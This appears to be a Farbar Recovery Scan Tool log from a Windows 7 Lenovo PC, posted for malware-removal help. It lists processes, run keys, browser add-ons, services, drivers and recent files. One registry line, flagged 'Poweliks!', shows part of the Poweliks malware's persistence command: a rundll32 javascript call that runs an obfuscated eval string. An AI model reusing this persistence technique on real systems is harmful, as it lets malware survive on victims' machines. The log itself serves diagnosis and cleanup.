(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
() C:\Program Files (x86)\AVG Secure Search\vprot.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\apcsystray.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\System Update\SUService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe
(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
() C:\Program Files\Lenovo\Lenovo Mouse Suite\FSRremoS.EXE
(Primax Electronics Ltd.) C:\Program Files\Lenovo\Lenovo Mouse Suite\PELMICED.EXE
() C:\Program Files\Lenovo\Lenovo Mouse Suite\PelElvDm.exe
() C:\Program Files (x86)\Lenovo\Message Center Plus\MCPLaunch.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Daemon for Mouse Suite] => C:\Program Files\Lenovo\Lenovo Mouse Suite\ICO.EXE [99840 2010-07-29] (Primax Electronics Ltd.)
HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2013-04-30] (LogMeIn, Inc.)
HKLM-x32\...\Run: [Power Manager Power Agenda] => C:\Program Files (x86)\ThinkPad\Utilities\DPMHost.EXE [75064 2010-07-28] ()
HKLM-x32\...\Run: [Lenovo Registration] => C:\Program Files (x86)\Lenovo Registration\LenovoReg.exe [4351712 2011-07-13] (Lenovo, Inc.)
HKLM-x32\...\Run: [D-Link D-Link DWA-125] => C:\Program Files (x86)\D-Link\DWA-125 revA\AirGCFG.exe [1024000 2010-05-21] (D-Link Corp.)
HKLM-x32\...\Run: [WZCSLDR2] => C:\Program Files (x86)\D-Link\DWA-125 revA\WZCSLDR2.exe [122880 2010-04-21] (Wireless Service)
HKLM-x32\...\Run: [Display] => C:\Program Files (x86)\APC\PowerChute Personal Edition\DataCollectionLauncher.exe [284024 2012-01-24] (Schneider Electric)
HKLM-x32\...\Run: [EaseUs Watch] => C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuWatch.exe [70792 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd)
HKLM-x32\...\Run: [EaseUs Tray] => C:\Program Files (x86)\EaseUS\Todo Backup\bin\TrayNotify.exe [743560 2011-12-26] (CHENGDU YIWO Tech Development Co., Ltd)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3593744 2014-09-05] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [vProt] => C:\Program Files (x86)\AVG Secure Search\vprot.exe [2640408 2014-08-26] ()
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1279120 2012-09-27] (CANON INC.)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [452272 2012-08-31] (CANON INC.)
Winlogon\Notify\GoToAssist Express Customer: C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_winlogonx64.dll (Citrix Online, LLC)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-606911418-3109034106-3922174115-1001\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-606911418-3109034106-3922174115-500\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\APC UPS Status.lnk
ShortcutTarget: APC UPS Status.lnk -> C:\Program Files (x86)\APC\PowerChute Personal Edition\Display.exe (Schneider Electric)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/webhp?rls=ig
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexbho.dll (CANON INC.)
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files (x86)\AVG\AVG2012\avgssiea.dll No File
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll No File
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO-x32: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files (x86)\AVG\AVG2012\avgssie.dll No File
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexhlp.dll (CANON INC.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll No File
Toolbar: HKCU - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexhlp.dll (CANON INC.)
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files (x86)\AVG\AVG2012\avgppa.dll No File
Handler-x32: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files (x86)\AVG\AVG2012\avgpp.dll No File
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll (AVG Secure Search)
Tcpip\..\Interfaces\{145F6C64-D76C-4A66-8658-02D842AE2435}: [NameServer] 8.8.8.8,8.8.4.4

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.9\\npsitesafety.dll No File
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll (CANON INC.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [ndibdjnfmopecpmkdieinmbadjfpblof] - C:\ProgramData\AVG Secure Search\ChromeExt\18.1.0.443\avg.crx [2014-04-17]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 APC Data Service; C:\Program Files (x86)\APC\PowerChute Personal Edition\dataserv.exe [21880 2012-01-24] (Schneider Electric)
R2 APC UPS Service; C:\Program Files (x86)\APC\PowerChute Personal Edition\mainserv.exe [705912 2012-01-24] (Schneider Electric)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3364368 2014-09-05] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [293448 2014-09-05] (AVG Technologies CZ, s.r.o.)
S2 D_Link_DWA-125; C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWZCSdS.exe [126976 2010-04-21] (Wireless Service) [File not signed]
R2 D_Link_DWA-125_WPS; C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWConnService.exe [53248 2010-03-03] () [File not signed]
R2 EaseUS Agent; C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe [61064 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
S2 GoToAssist Remote Support Customer; C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_service.exe [610888 2014-09-25] (Citrix Online, LLC)
R2 Guard Agent; C:\Program Files (x86)\EaseUS\Todo Backup\bin\GuardAgent.exe [23176 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [376168 2014-11-03] (LogMeIn, Inc.)
R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [226152 2014-11-03] (LogMeIn, Inc.)
R2 LMS; C:\Program Files (x86)\Intel\AMT\LMS.exe [174616 2009-07-21] (Intel Corporation)
R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2013-04-30] (LogMeIn, Inc.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 PelService; C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe [177152 2010-04-22] () [File not signed]
R2 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [28672 2011-07-25] (Lenovo Group Limited) [File not signed]
R2 ThinkVantage Registry Monitor Service; C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe [1019904 2009-08-28] (Lenovo Group Limited) [File not signed]
S3 TVT Backup Service; C:\Program Files (x86)\Lenovo\Rescue and Recovery\rrservice.exe [1475896 2010-07-29] (Lenovo Group Limited)
R2 UNS; C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2066968 2009-07-21] (Intel Corporation)
S2 vToolbarUpdater18.1.9; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [1820184 2014-08-11] (AVG Secure Search)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 anodlwf; C:\Windows\System32\DRIVERS\anodlwfx.sys [15872 2009-03-06] ()
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [153368 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [247576 2014-07-24] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [190744 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [243480 2014-08-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [313624 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [123672 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31512 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [270616 2014-07-02] (AVG Technologies CZ, s.r.o.)
R1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-08-11] (AVG Technologies)
R0 EUBAKUP; C:\Windows\System32\drivers\eubakup.sys [57480 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R0 EUBKMON; C:\Windows\System32\drivers\EUBKMON.sys [51336 2011-12-22] () [File not signed]
R1 EUDSKACS; C:\Windows\system32\drivers\eudskacs.sys [19592 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R1 EUFDDISK; C:\Windows\system32\drivers\EuFdDisk.sys [189576 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2013-04-30] (LogMeIn, Inc.)
S4 LMIRfsClientNP; No ImagePath
R1 mbamchameleon; C:\Windows\system32\drivers\mbamchameleon.sys [93400 2014-10-01] (Malwarebytes Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-05] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)
S3 netr28ux; C:\Windows\System32\DRIVERS\Dnetr28ux.sys [1119072 2010-05-05] (Ralink Technology Corp.)
R3 pelmouse; C:\Windows\System32\DRIVERS\pelmouse.sys [23040 2010-10-20] (TPMX Electronics Ltd.)
R3 pelusblf; C:\Windows\System32\DRIVERS\pelusblf.sys [33280 2010-12-22] (TPMX Electronics Ltd.)
R1 Serial; C:\Windows\System32\DRIVERS\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-11-03] ()
R3 TVTI2C; C:\Windows\System32\DRIVERS\Tvti2c.sys [41536 2009-07-02] (Lenovo (United States) Inc.)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-03 21:16 - 2014-11-03 21:16 - 00004669 _____ () C:\Users\Deborah\Downloads\RKreport_SCN_11032014_211524.log
2014-11-03 21:10 - 2014-11-03 21:10 - 14670424 _____ () C:\Users\Deborah\Downloads\RogueKiller.exe
2014-11-03 21:10 - 2014-11-03 21:10 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-11-03 21:10 - 2014-11-03 21:10 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-11-02 15:12 - 2014-11-02 15:12 - 00000000 ____D () C:\Users\Deborah\Downloads\FRST-OlderVersion
2014-10-31 06:49 - 2014-10-31 06:49 - 05591672 _____ (Swearware) C:\Users\Deborah\Downloads\ComboFix.exe
2014-10-31 06:33 - 2014-10-31 06:33 - 00018772 _____ () C:\Users\Deborah\Downloads\DDS.txt
2014-10-31 06:33 - 2014-10-31 06:33 - 00005354 _____ () C:\Users\Deborah\Downloads\Attach.txt
2014-10-31 06:32 - 2014-10-31 06:32 - 00018772 _____ () C:\Users\Deborah\Desktop\dds.txt
2014-10-31 06:32 - 2014-10-31 06:32 - 00005354 _____ () C:\Users\Deborah\Desktop\attach.txt
2014-10-31 06:18 - 2014-10-31 06:18 - 00688992 ____R (Swearware) C:\Users\Deborah\Downloads\dds.com
2014-10-31 05:55 - 2014-11-02 22:17 - 00027584 _____ () C:\Users\Deborah\Downloads\Addition.txt
2014-10-31 05:52 - 2014-11-05 10:40 - 00018594 _____ () C:\Users\Deborah\Downloads\FRST.txt
2014-10-31 05:50 - 2014-11-05 10:40 - 00000000 ____D () C:\FRST
2014-10-31 05:50 - 2014-11-02 15:12 - 02114560 _____ (Farbar) C:\Users\Deborah\Downloads\FRST64.exe
2014-10-31 05:27 - 2014-10-31 05:27 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-31 05:25 - 2014-10-31 05:25 - 29458856 _____ (Oracle Corporation) C:\Users\Deborah\Downloads\jre-7u71-windows-i586.com
2014-10-31 05:24 - 2014-10-31 05:24 - 29727656 _____ (Oracle Corporation) C:\Users\Deborah\Downloads\jre-8u25-windows-i586.com
2014-10-31 04:59 - 2014-11-03 18:47 - 00029324 _____ () C:\Windows\PFRO.log
2014-10-31 04:15 - 2010-08-30 07:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-10-31 04:12 - 2014-10-31 04:16 - 00000000 ____D () C:\AdwCleaner
2014-10-30 20:00 - 2014-10-30 20:00 - 01375089 _____ () C:\Users\Deborah\Downloads\adwcleaner_3.311.exe
2014-10-29 15:01 - 2014-11-03 18:52 - 00000336 _____ () C:\Windows\setupact.log
2014-10-29 15:01 - 2014-10-29 15:01 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-27 12:12 - 2014-10-27 12:12 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Deborah\Downloads\tdsskiller.exe
2014-10-22 09:46 - 2014-10-22 09:46 - 00000028 _____ () C:\Windows\SysWOW64\u
2014-10-21 09:54 - 2014-10-21 09:54 - 00000000 ____D () C:\Users\Deborah\AppData\Roaming\AVG2015
2014-10-21 09:51 - 2014-10-21 09:53 - 00000000 ____D () C:\ProgramData\AVG2015
2014-10-21 09:51 - 2014-10-21 09:51 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Avg
2014-10-21 09:46 - 2014-10-21 09:59 - 00000000 ____D () C:\Users\Deborah\AppData\Local\Avg2015
2014-10-15 13:53 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 13:53 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 13:53 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 13:53 - 2014-08-18 22:11 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-15 13:53 - 2014-08-18 22:10 - 00616352 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-15 13:53 - 2014-08-18 22:08 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-15 13:53 - 2014-08-18 22:08 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-15 13:53 - 2014-08-18 22:08 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2014-10-15 13:53 - 2014-08-18 22:07 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-15 13:53 - 2014-08-18 22:07 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00032256 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-15 13:53 - 2014-08-18 21:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-15 13:53 - 2014-08-18 21:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2014-10-15 13:53 - 2014-08-18 21:06 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-15 13:53 - 2014-07-06 21:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-15 13:53 - 2014-07-06 21:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-15 13:53 - 2014-07-06 21:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 05551032 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-15 13:53 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-15 13:53 - 2014-07-06 21:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-15 13:53 - 2014-07-06 21:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-15 13:53 - 2014-07-06 21:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-15 13:53 - 2014-07-06 20:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-15 13:53 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
